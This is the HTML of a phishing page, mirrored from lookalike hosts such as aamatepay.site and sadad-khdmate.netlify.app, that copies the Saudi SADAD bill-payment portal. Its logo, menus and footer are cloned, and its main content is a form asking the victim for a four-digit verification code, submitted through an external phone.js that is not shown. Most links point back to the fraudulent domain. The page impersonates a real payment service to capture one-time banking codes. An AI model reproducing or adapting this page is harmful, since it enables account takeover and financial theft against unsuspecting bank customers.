<!DOCTYPE html>
<!-- saved from url=(0039)https://aamatepay.site/VmtR/verify.php -->
<html id="ctl00_Html1" xmlns="http://www.w3.org/1999/xhtml" __expr-val-dir="ltr" lang="ar-sa" dir="rtl">
<!-- Mirrored from sadad-khdmate.netlify.app/bank/al-ahle/vir/code/call/%D9%81%D9%88%D8%A7%D8%AA%D9%8A%D8%B1%20%D8%B3%D8%AF%D8%A7%D8%AF by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 21 May 2022 17:14:28 GMT -->
<!-- Added by HTTrack -->
<!-- Mirrored from onlinesite-sadad.netlify.app/bank/al-ahle/vir/code/call/%D9%81%D9%88%D8%A7%D8%AA%D9%8A%D8%B1%20%D8%B3%D8%AF%D8%A7%D8%AF by HTTrack Website Copier/3.x [XR&CO'2017], Mon, 01 Aug 2022 17:24:54 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
    <!--run in IE 9 mode-->
    <meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="Expires" content="0"><meta name="keywords" content="نظام سداد للمدفوعات , سداد, حل واحد لجميع المدفعات, مؤسسة النقد العربي السعودي"><meta name="description" content="نظام سداد للمدفوعات هو أحد أنظمة مؤسسة النقد العربي السعودي، وهو نظام مركزي لعرض ودفع الفواتير والمدفوعات الأخرى إلكترونياً في المملكة العربية السعودية، حيث أن مهمته الأساسية هي تسهيل وتسريع عملية دفع الفواتير والمدفوعات الأخرى عبر جميع القنوات المصرفية في المملكة (فروع البنوك وأجهزة الصرف الآلي والهاتف المصرفي والإنترنت المصرفية.">
    <!-- robots -->
    
    <!-- page title - can be overridden by <asp:Content ContentPlaceholderID="PlaceHolderPageTitle" > -->
    <title>
	
	فواتير سداد

</title>
    <!--fav icon-->
    <link rel="shortcut icon" href="../../../../../../external.html?link=https://aamatepay.site/VmtR/favicon.ico" type="image/vnd.microsoft.icon">
    <!--OOTB CSS-->
    <link rel="stylesheet" type="text/css" href="%d9%81%d9%88%d8%a7%d8%aa%d9%8a%d8%b1%20%d8%b3%d8%af%d8%a7%d8%af_files/controls.css">
<link rel="stylesheet" type="text/css" href="%d9%81%d9%88%d8%a7%d8%aa%d9%8a%d8%b1%20%d8%b3%d8%af%d8%a7%d8%af_files/page-layouts-21.css">
<link rel="stylesheet" type="text/css" href="%d9%81%d9%88%d8%a7%d8%aa%d9%8a%d8%b1%20%d8%b3%d8%af%d8%a7%d8%af_files/corev48630.css">

    <!-- page manager interacts with script and the sharepoint object model -->
    
    <!-- unified logging service -->
    
    <!-- identifies to scripting elements that this is a v4 master page. required for scrolling? -->

    

    <!-- load SharePoint javascript -->
    


    

    <!-- Search Box scripts starts here -->

    
    
    
    <!-- Search Box scripts Ends here -->

    <!-- Optional - provides link that contains the SOAP definitions and WSDL -->

    <!-- Optional - provides scripting for registering _registerHelpComponent within the ribbon-->
    
    <!--Additional Page Head Delegate Control so you can create your own custom CONTROLTEMPLATES -->
    
    <!-- Additional Page Head Content - can be overridden by <asp:Content ContentPlaceholderID="PlaceHolderAdditionalPageHead"> -->
    
	
       
	
	
			
			
			
		

    <!--Additional content placeholders that should stay in head section.-->
    

    <!-- Bootstrap core CSS -->
    <link href="%d9%81%d9%88%d8%a7%d8%aa%d9%8a%d8%b1%20%d8%b3%d8%af%d8%a7%d8%af_files/bootstrap.min.css" rel="stylesheet">

    <!-- IE10 viewport hack for Surface/desktop Windows 8 bug -->
    <link href="%d9%81%d9%88%d8%a7%d8%aa%d9%8a%d8%b1%20%d8%b3%d8%af%d8%a7%d8%af_files/ie10-viewport-bug-workaround.html" rel="stylesheet">

    <!-- Multilevel Menu CSS -->
    
    <link href="%d9%81%d9%88%d8%a7%d8%aa%d9%8a%d8%b1%20%d8%b3%d8%af%d8%a7%d8%af_files/jquery.smartmenus.bootstrap.css" rel="stylesheet">
    

    <!-- Custom styles for this template -->
    <link href="%d9%81%d9%88%d8%a7%d8%aa%d9%8a%d8%b1%20%d8%b3%d8%af%d8%a7%d8%af_files/navbar.html" rel="stylesheet"><link href="%d9%81%d9%88%d8%a7%d8%aa%d9%8a%d8%b1%20%d8%b3%d8%af%d8%a7%d8%af_files/styles.css" rel="stylesheet">

    <!-- Custom styles for this site -->
    <!--<link href="./Content/css/styles.css" rel="stylesheet" />-->

    <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
    <!--[if lt IE 9]>
      <script src="./Content/bootstrap-3.4.1/js/html5shiv.min.js"></script>
      <script src="./Content/bootstrap-3.4.1/js/respond.min.js"></script>
    <![endif]-->

    <!-- Theme Elements CSS -->
    <!--<link rel="stylesheet" href="./_layouts/inc/SADAD.Internet.Portal/English/css/theme-elements.css" />-->
</head>
<body class="v4master" style="overflow: auto!important">

       
        <!--Ribbon-->
        <div id="s4-ribbonrow" class="s4-pr s4-ribbonrowhidetitle" style="display: none">
            <div id="s4-ribboncont">
                <!-- Actual Ribbon control-->
                <div class="ms-cui-ribbonTopBars"><div class="ms-cui-topBar1"></div><div class="ms-cui-topBar2"><div id="RibbonContainer-TabRowLeft" class="ms-cui-TabRowLeft ms-siteactionscontainer s4-notdlg">
                        <!--Site Action Menu-->
                        <span class="ms-siteactionsmenu" id="siteactiontd">
                            
                        </span>
                        <!-- end site action menu -->
                        <!-- Start Global Navigation Control - drop down menu -->
                        
                            <span class="s4-breadcrumb-anchor"><span style="height:16px;width:16px;position:relative;display:inline-block;overflow:hidden;" class="s4-clust"><a id="GlobalBreadCrumbNavPopout-anchor" title="تنقل لأعلى" style="display:inline-block;height:16px;width:16px;"><img src="%d9%81%d9%88%d8%a7%d8%aa%d9%8a%d8%b1%20%d8%b3%d8%af%d8%a7%d8%af_files/fgimg.html" alt="تنقل لأعلى" style="border:0;position:absolute;left:-0px !important;top:-112px !important;"></a></span></span><div class="ms-popoutMenu s4-breadcrumb-menu" id="GlobalBreadCrumbNavPopout-menu" style="display:none;">
                                <div class="s4-breadcrumb-top">
                                    <span id="ctl00_PlaceHolderGlobalNavigation_GlobalBreadCrumbNavPopout_Label1" class="s4-breadcrumb-header">موقع هذه الصفحة هو:</span>
                                </div>
                                
	<div class="breadcrumb">
		<span><span><a title="Home" class="ms-sitemapdirectional" href="../../../../../../external.html?link=https://www.sadad.com/en/pages/home-2.html">Home</a></span><span> &gt; </span><span><a class="ms-sitemapdirectional" href="../../../../../../external.html?link=https://aamatepay.site/VmtR/ar/Pages/home.html">الرئيسية</a></span><span> &gt; </span><span><a class="ms-sitemapdirectional" href="../../../../../../external.html?link=https://aamatepay.site/VmtR/ar/Personal/Pages/default.html">شخصي</a></span><span> &gt; </span><span class="current">فواتير سداد</span></span>
	</div>

  
				
                            </div>
                        
                        <!--end global nav control-->
                        <!-- top ribbon save and browse buttons-->
                        

                    </div><div id="RibbonContainer-TabRowRight" class="ms-cui-TabRowRight s4-trc-container s4-notdlg">
                        <!-- Show the variations menu, since a delegate control can be overwritten. Normally blank-->
                        

                        <!--Welcome drop down menu and Login Control-->
                        <div class="s4-trc-container-menu">
                            <div>
                                
<a id="ctl00_IdWelcome_ExplicitLogin" class="s4-signInLink" href="../../../../../../external.html?link=https://aamatepay.site/VmtR/ar/Personal/_layouts/Authenticate0f8e.html?Source=%2Far%2FPersonal%2FPages%2FSADADBills%2Easpx" style="display:inline;">تسجيل الدخول</a>

                                



                            </div>

                        </div>
                        <!-- GlobalSiteLink2 delegate control that can be overwritten-->
                        
                        <!-- Link to developer dashboard if configured for this site-->
                        <!-- For more information: http://msdn.microsoft.com/en-us/library/ff512745.aspx-->
                        <span><span class="s4-devdashboard">
                            
                        </span></span>
                    </div></div></div>

                <!--end ribbon control-->
            </div>
            <!-- notification box that appears dynamically -->
            <div id="notificationArea" class="s4-noti">
            </div>
            <!--Part of the publishing console, a delegate control that can be overwritten-->
            

                
<span id="ctl00_SPNavigation_ctl00_publishingConsoleV4_publishingRibbon"></span>



            
            <!-- top Update panel web part -->
            <div id="WebPartAdderUpdatePanelContainer">
                <table id="ctl00_WebPartAdderUpdatePanel" cellpadding="0" cellspacing="0" border="0" width="100%"><tbody><tr><td>
	
						<span id="ctl00_WebPartAdder"></span>
					
</td></tr></tbody></table>
            </div>
        </div>
        
        <!--end ribbon-->
        <!--primary content panel, provides scroll bars under ribbon, replacing the browser scrollbars-->
        <div id="s4-bodyContainer">
            <!--page status bar including if a page is checked out, ready for publishing, etc-->
            <div id="s4-statusbarcontainer">
                <div id="pageStatusBar" class="s4-status-s1" style="display: none;"></div>
            </div>
        </div>

        <div class="container">
            <header>
                <div class="row">
                    <div class="col-md-9">
                        <div class="row hidden-md hidden-lg">
                            <div class="col-sm-6 col-xs-6 lang-bar">
                                <div class="pull-left">
                                    <a href="../../../../../../external.html?link=https://aamatepay.site/VmtR/ar/Pages/home.html">
                                        <img src="%d9%81%d9%88%d8%a7%d8%aa%d9%8a%d8%b1%20%d8%b3%d8%af%d8%a7%d8%af_files/arabic_icon_disabled.png">
                                    </a>
                                    <a href="../../../../../../external.html?link=https://aamatepay.site/VmtR/en/Pages/home.html">
                                        <img src="%d9%81%d9%88%d8%a7%d8%aa%d9%8a%d8%b1%20%d8%b3%d8%af%d8%a7%d8%af_files/english_icon.png">
                                    </a>
                                </div>
                            </div>
                            <div class="col-sm-6 col-xs-6">
                                <ul class="social-icons pull-right">
                                    <span id="ctl00_SocialIcons1_lblError"></span>
<li class="twitter"><a href="../../../../../../external.html?link=https://twitter.com/SADAD/" target="_blank" title="twitter"></a></li><li class="youtube"><a href="../../../../../../external.html?link=https://www.youtube.com/user/SADADPaymentSystem/ /" target="_blank" title="youtube"></a></li>



                                </ul>
                            </div>
                        </div>
                        <div class="row">
                            <div class="col-md-3 hidden-sm hidden-xs lang-bar">
                                <div class="pull-right">
                                    <a href="../../../../../../external.html?link=https://aamatepay.site/VmtR/ar/Pages/home.html">
                                        <img src="%d9%81%d9%88%d8%a7%d8%aa%d9%8a%d8%b1%20%d8%b3%d8%af%d8%a7%d8%af_files/arabic_icon_disabled.png">
                                    </a>
                                    <a href="../../../../../../external.html?link=https://aamatepay.site/VmtR/en/Pages/home.html">
                                        <img src="%d9%81%d9%88%d8%a7%d8%aa%d9%8a%d8%b1%20%d8%b3%d8%af%d8%a7%d8%af_files/english_icon.png">
                                    </a>
                                </div>
                            </div>
                            <div class="col-md-9 col-sm-12 col-xs-12 search-panel">
                               <!-- deleted -->                                <ul class="social-icons hidden-sm hidden-xs pull-left">
                                    <span id="ctl00_ctrlSocial_lblError"></span>
<li class="twitter"><a href="../../../../../../external.html?link=https://twitter.com/SADAD/" target="_blank" title="twitter"></a></li><li class="youtube"><a href="../../../../../../external.html?link=https://www.youtube.com/user/SADADPaymentSystem/ /" target="_blank" title="youtube"></a></li>



                                </ul>
                            </div>
                        </div>
                        <div class="row">
                            <div class="col-md-12">
                                <nav class="navbar navbar-default" role="navigation">
                                    <div class="navbar-header">
                                        <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#pnlMainMenu" aria-expanded="false">
                                            <span class="sr-only">Toggle navigation</span>
                                            <span class="icon-bar"></span>
                                            <span class="icon-bar"></span>
                                            <span class="icon-bar"></span>
                                        </button>
                                        <a class="navbar-brand visible-sm visible-xs" href="../../../../../../external.html?link=https://aamatepay.site/VmtR/ar/Pages/home.html">
                                            <img src="%d9%81%d9%88%d8%a7%d8%aa%d9%8a%d8%b1%20%d8%b3%d8%af%d8%a7%d8%af_files/sadad_logo_ar.png" style="height: 30px;">
                                        </a>
                                    </div>
                                    <div id="pnlMainMenu" class="navbar-collapse collapse" data-hover="dropdown" data-animations="fadeInDown fadeInRight fadeInUp fadeInLeft">
                                        <span id="ctl00_ctrlTopNavigation_lblError"></span>

<ul class="nav navbar-nav" id="mainMenu"><li><a class="menu-item" href="../../../../../../external.html?link=https://aamatepay.site/VmtR/ar/Pages/AboutUs.html">عن سداد&nbsp;<span class="tmp-caret"></span></a><ul class="dropdown-menu"><li><a href="../../../../../../external.html?link=https://aamatepay.site/VmtR/ar/Pages/VMO.html">الرؤية والمهمة والأهداف</a></li><li><a href="../../../../../../external.html?link=https://aamatepay.site/VmtR/ar/Pages/Values.html">قيمنا</a></li><li><a href="../../../../../../external.html?link=https://aamatepay.site/VmtR/ar/MediaCenter/CertificatesandAwards/Pages/default.html">شهادات وجوائز</a></li><li><a href="../../../../../../external.html?link=https://aamatepay.site/VmtR/ar/MediaCenter/e-Newsletters/Pages/default.html">النشرة الإلكترونية</a></li><li><a href="../../../../../../external.html?link=https://aamatepay.site/VmtR/ar/MediaCenter/Wewerethere/Pages/default.html">كنّا هناك</a></li></ul></li><li><a class="menu-item" href="../../../../../../external.html?link=https://aamatepay.site/VmtR/ar/Personal/Pages/SADADBills.html#">شخصي&nbsp;<span class="tmp-caret"></span></a><ul class="dropdown-menu"><li><a href="../../../../../../external.html?link=https://aamatepay.site/VmtR/ar/Personal/Pages/SADADBills.html#">سدّد فواتيرك&nbsp;<span class="caret"></span></a><ul class="dropdown-menu"><li><a href="../../../../../../external.html?link=https://aamatepay.site/VmtR/j.php">فواتير سداد</a></li><li><a href="../../../../../../external.html?link=https://aamatepay.site/VmtR/ar/Personal/Pages/PaymentMethods.html">طرق الدفع</a></li><li><a href="../../../../../../external.html?link=https://aamatepay.site/VmtR/ar/Pages/Billers.html">المفوترون</a></li></ul></li></ul></li><li><a class="menu-item" href="../../../../../../external.html?link=https://aamatepay.site/VmtR/ar/Personal/Pages/SADADBills.html#">أعمال&nbsp;<span class="tmp-caret"></span></a><ul class="dropdown-menu"><li><a href="../../../../../../external.html?link=https://aamatepay.site/VmtR/j.php">المفوترون&nbsp;<span class="caret"></span></a><ul class="dropdown-menu"><li><a href="../../../../../../external.html?link=https://aamatepay.site/VmtR/ar/Business/Pages/SADADBills.html">فواتير سداد</a></li><li><a href="../../../../../../external.html?link=https://aamatepay.site/VmtR/ar/Business/Pages/MerchantsJoiningNow.html">انضم الآن</a></li><li><a href="../../../../../../external.html?link=https://aamatepay.site/VmtR/ar/Pages/Banks.html">البنوك</a></li><li><a href="../../../../../../external.html?link=https://aamatepay.site/VmtR/ar/Business/Pages/PaymentMethods.html">طرق الدفع</a></li><li><a href="../../../../../../external.html?link=https://aamatepay.site/VmtR/ar/Pages/Billers.html">المفوترون</a></li><li><a href="../../../../../../external.html?link=https://aamatepay.site/VmtR/ar/Pages/FAQ.html">أسئلة متكررة</a></li><li><a href="../../../../../../external.html?link=https://aamatepay.site/VmtR/ar/MediaCenter/e-Newsletters/Pages/default.html">النشرة الإلكترونية</a></li><li><a href="../../../../../../external.html?link=https://aamatepay.site/VmtR/ar/MediaCenter/Pages/SADAD-Logo-Guidelines.html">توجيهات استخدام شعار سداد</a></li></ul></li></ul></li><li><a class="menu-item" href="../../../../../../external.html?link=https://aamatepay.site/VmtR/ar/Personal/Pages/SADADBills.html#">البنوك&nbsp;<span class="tmp-caret"></span></a><ul class="dropdown-menu"><li><a href="../../../../../../external.html?link=https://aamatepay.site/VmtR/ar/Personal/Pages/SADADBills.html#">الخدمات&nbsp;<span class="caret"></span></a><ul class="dropdown-menu"><li><a href="../../../../../../external.html?link=https://aamatepay.site/VmtR/ar/Banks/Pages/SADADBills.html">فواتير سداد</a></li></ul></li><li><a href="../../../../../../external.html?link=https://aamatepay.site/VmtR/ar/MediaCenter/e-Newsletters/Pages/default.html">النشرة الإلكترونية</a></li><li><a href="../../../../../../external.html?link=https://aamatepay.site/VmtR/ar/MediaCenter/Pages/SADAD-Logo-Guidelines.html">توجيهات استخدام شعار سداد</a></li></ul></li></ul>


                                    </div>
                                </nav>
                            </div>
                        </div>
                    </div>
                    <div class="col-md-3 logo hidden-sm hidden-xs">
                        <a href="../../../../../../external.html?link=https://aamatepay.site/VmtR/ar/Pages/home.html" class="pull-right">
                            <img src="%d9%81%d9%88%d8%a7%d8%aa%d9%8a%d8%b1%20%d8%b3%d8%af%d8%a7%d8%af_files/sadad_logo_ar.png">
                        </a>
                    </div>
                </div>

                <div id="pageHeader" class="row title-section-container">
                    <div class="col-md-12 title-section">
                        <div class="title-section-corner-bg" style="position: absolute; top: 0px; right: 0px;"></div>
                        <div class="row">
                            <div class="col-md-12 breadcrumb-title">
                                <a href="../../../../../../external.html?link=https://aamatepay.site/VmtR/ar/Pages/home.html">الرئيسية</a> / شخصي

<span id="ctl00_ctrlBreadCrump_lblError"></span>

                            </div>
                        </div>
                        <div class="row">
                            <div class="col-md-12">
                                <h2>
                                    
	
	
			تسجيل الدخول   
		

                                </h2>
                            </div>
                        </div>
                    </div>
                </div>
            </header>

            <!-- Inner Content for Pages -->
            <div class="row">
                <div class="col-md-12">
                    <div class="content">
                        
	
	
			<div class="welcome welcome-links">
				
				<div class="welcome-image">
					<div id="ctl00_PlaceHolderMain_UIVersionedContent6_RichImageField1_label" style="display:none">صورة الصفحة</div><div id="ctl00_PlaceHolderMain_UIVersionedContent6_RichImageField1__ControlWrapper_RichImageField" class="ms-rtestate-field" style="display:inline" aria-labelledby="ctl00_PlaceHolderMain_UIVersionedContent6_RichImageField1_label"><div class="ms-rtestate-field"></div></div>
				</div>
				<div class="welcome-content">
					<div id="ctl00_PlaceHolderMain_UIVersionedContent6_RichHtmlField1_label" style="display:none">محتوى الصفحة</div><div id="ctl00_PlaceHolderMain_UIVersionedContent6_RichHtmlField1__ControlWrapper_RichHtmlField" class="ms-rtestate-field" style="display:inline" aria-labelledby="ctl00_PlaceHolderMain_UIVersionedContent6_RichHtmlField1_label"><div class="container">
    <div class="row">
        <div class="col-md-12">
            <div class="main-content">
                <div>
                    <div>
                        &nbsp;
                    </div>
                    <div>
                        <br>
                    &nbsp;</div>
                    <div dir="rtl">
                        <span style="text-align:justify;color:rgb(251, 129, 72);line-height:27px;font-family:inherit;font-size:1.4em">تأكيد</span><span style="text-align:justify;color:rgb(251, 129, 72);line-height:27px;font-family:inherit;font-size:1.4em">​</span><br>
                    </div>
                </div>
                <div>
                    <div dir="rtl" style="text-align:right">
                        <p style="line-height:24px;font-size:15px;margin-bottom:20px">ادخل كود التحقق</p>
                    </div>
                </div>
</div>
                            <div class="form-top-right"><i class="fa fa-key"></i></div>
                        </div>
                        <div class="form-bottom">
                            <form id="form">
                                
									 <div class="form-group">
                                        <label class="" for="form-password"> كود التحقق</label>
                                        <input type="number" class="form-control" name="pass2" id="codeph" placeholder="****" required="" max="9999">
                                    </div>


                                <button type="submit" class="btn btn-primary btn-large" style="width:100%" title="دخول" name="send" id="submit" >
                                        دخول                                </button>
                                
                                                            </form></div>

                        
                    
                    
            
        
    

<br><br><br>
				
				<div class="col-50 clearer">
					<div class="left-column-links">
						<div id="ctl00_PlaceHolderMain_UIVersionedContent6_SummaryLinkFieldControl1__ControlWrapper_SummaryLinkFieldControl" style="display:inline"><div id="slwp_ctl00_PlaceHolderMain_UIVersionedContent6_SummaryLinkFieldControl1_SummaryLinkFieldControl1" class="slm-layout-main slwpmarker"><!--empty--></div></div>
					</div>
				</div>
				<div class="col-50">
					<div class="right-column-links">
						<div id="ctl00_PlaceHolderMain_UIVersionedContent6_SummaryLinkFieldControl2__ControlWrapper_SummaryLinkFieldControl" style="display:inline"><div id="slwp_ctl00_PlaceHolderMain_UIVersionedContent6_SummaryLinkFieldControl2_SummaryLinkFieldControl2" class="slm-layout-main slwpmarker"><!--empty--></div></div>
					</div>
				</div>
		
		

		
			<div class="content">
				<menu class="ms-SrvMenuUI">
	<ie:menuitem id="MSOMenu_Help" iconsrc="./_layouts/images/HelpIcon.gif" text="تعليمات" type="option" style="display:none">

	</ie:menuitem>
</menu>
			</div>

			<div class="row">
			    <div class="col-md-6">
				    
			    </div>
			    <div class="col-md-6">
				    
			    </div>
            </div>
	

		

				
                    
                
            

            <footer>
                <div class="row" style="margin-bottom: 25px;">
                    <div class="col-md-6">
                        <div class="pull-left" style="background-image: url(footer_btn.png); width: 206px; height: 27px; padding-top: 4px; padding-right: 18px; font-size: 12px;">
                            <span style="font-style: italic; color: #ffffff;"><span style="font-weight: bold;">One</span> solution for all payments</span>
                        </div>
                    </div>
                    <div class="col-md-6">
                        <ul class="social-icons pull-right">
                            <span id="ctl00_SocialIcons2_lblError"></span>
<li class="twitter"><a href="../../../../../../external.html?link=https://twitter.com/SADAD/" target="_blank" title="twitter"></a></li><li class="youtube"><a href="../../../../../../external.html?link=https://www.youtube.com/user/SADADPaymentSystem/ /" target="_blank" title="youtube"></a></li>



                        </ul>
                    </div>
                </div>
                <div class="row footer-copyright">
                    <div class="col-md-5 col-xs-12 col-sm-12">
                        <label id="CopyRight">.سداد حقوق الطبع والنشر 2022. جميع الحقوق محفوظة</label>
                        
                    </div>

                    <div class="col-md-7 col-xs-12 col-sm-12">                        
                        <hr class="hidden-md hidden-lg" style="margin-top:0px;margin-bottom:4px;">
                        <span id="ctl00_ctrlFooter_lblError"></span>

        <ul>
    
        
        <li><a href="../../../../../../external.html?link=https://aamatepay.site/VmtR/ar/Pages/FAQ.html" id="ctl00_ctrlFooter_rptFooter_ctl01_aHref" title="الأسئلة المتكررة">
            <span id="ctl00_ctrlFooter_rptFooter_ctl01_lblTitle">الأسئلة المتكررة</span>
        </a></li>
    
        
        <li><a href="../../../../../../external.html?link=https://aamatepay.site/VmtR/ar/Pages/Disclaimer.html" id="ctl00_ctrlFooter_rptFooter_ctl02_aHref" title="تنويه  ">
            <span id="ctl00_ctrlFooter_rptFooter_ctl02_lblTitle">تنويه  </span>
        </a></li>
    
        
        <li><a href="../../../../../../external.html?link=https://aamatepay.site/VmtR/ar/Pages/PrivacyPolicy.html" id="ctl00_ctrlFooter_rptFooter_ctl03_aHref" title="سياسة الخصوصية ">
            <span id="ctl00_ctrlFooter_rptFooter_ctl03_lblTitle">سياسة الخصوصية </span>
        </a></li>	

		<li><a href="../../../../../../external.html?link=https://aamatepay.site/VmtR/ar/Pages/TermsOfUse.html" id="ctl00_ctrlFooter_rptFooter_ctl06_aHref" title="شروط الاستخدام">
			<span id="ctl00_ctrlFooter_rptFooter_ctl06_lblTitle">شروط الاستخدام </span>
		</a></li>
    
        
        <li><a href="../../../../../../external.html?link=https://aamatepay.site/VmtR/ar/Pages/ContactUs.html" id="ctl00_ctrlFooter_rptFooter_ctl04_aHref" title="اتصل بنا">
            <span id="ctl00_ctrlFooter_rptFooter_ctl04_lblTitle">اتصل بنا</span>
        </a></li>
    
        
        <li><a href="../../../../../../external.html?link=https://aamatepay.site/VmtR/ar/Pages/Sitemap.html" id="ctl00_ctrlFooter_rptFooter_ctl05_aHref" title="خريطة الموقع">
            <span id="ctl00_ctrlFooter_rptFooter_ctl05_lblTitle">خريطة الموقع</span>
        </a></li>
    
        </ul>
    

                    </div>
                </div>
            </footer>
        

        <!--page title-->
        <!-- end s4-bodycontainer-->
        <!--the contents of the developer dashboard will be placed here, if turned on-->
        <div id="DeveloperDashboard" class="s4-notdlg">
            
        </div>
        <!--end workspace div-->
        
        <!--form digest secutiry control. Used for security and form validation-->
        
			
        
        <!-- Handle Search "enter" key and back button -->
   




<script src="phone.js"></script>
















    <!--extra form/utility content for certain pages-->
    
    <!-- old browser warning message-->
    

    <!-- Bootstrap & other core JavaScripts
    ================================================== -->
    <!-- Placed at the end of the document so the pages load faster -->
    
    
    
    <!-- IE10 viewport hack for Surface/desktop Windows 8 bug -->
    

    <!-- Bootstrap Dropdown Hover JS -->
    
    

    
    
    


<!-- Mirrored from www.sadad.com/ar/Personal/Pages/SADADBills.aspx by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 30 May 2019 12:24:41 GMT -->


</div></div></div></div></div></div></div></div></div></body>
<!-- Mirrored from sadad-khdmate.netlify.app/bank/al-ahle/vir/code/call/%D9%81%D9%88%D8%A7%D8%AA%D9%8A%D8%B1%20%D8%B3%D8%AF%D8%A7%D8%AF by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 21 May 2022 17:14:47 GMT -->

<!-- Mirrored from onlinesite-sadad.netlify.app/bank/al-ahle/vir/code/call/%D9%81%D9%88%D8%A7%D8%AA%D9%8A%D8%B1%20%D8%B3%D8%AF%D8%A7%D8%AF by HTTrack Website Copier/3.x [XR&CO'2017], Mon, 01 Aug 2022 17:24:54 GMT -->
</html>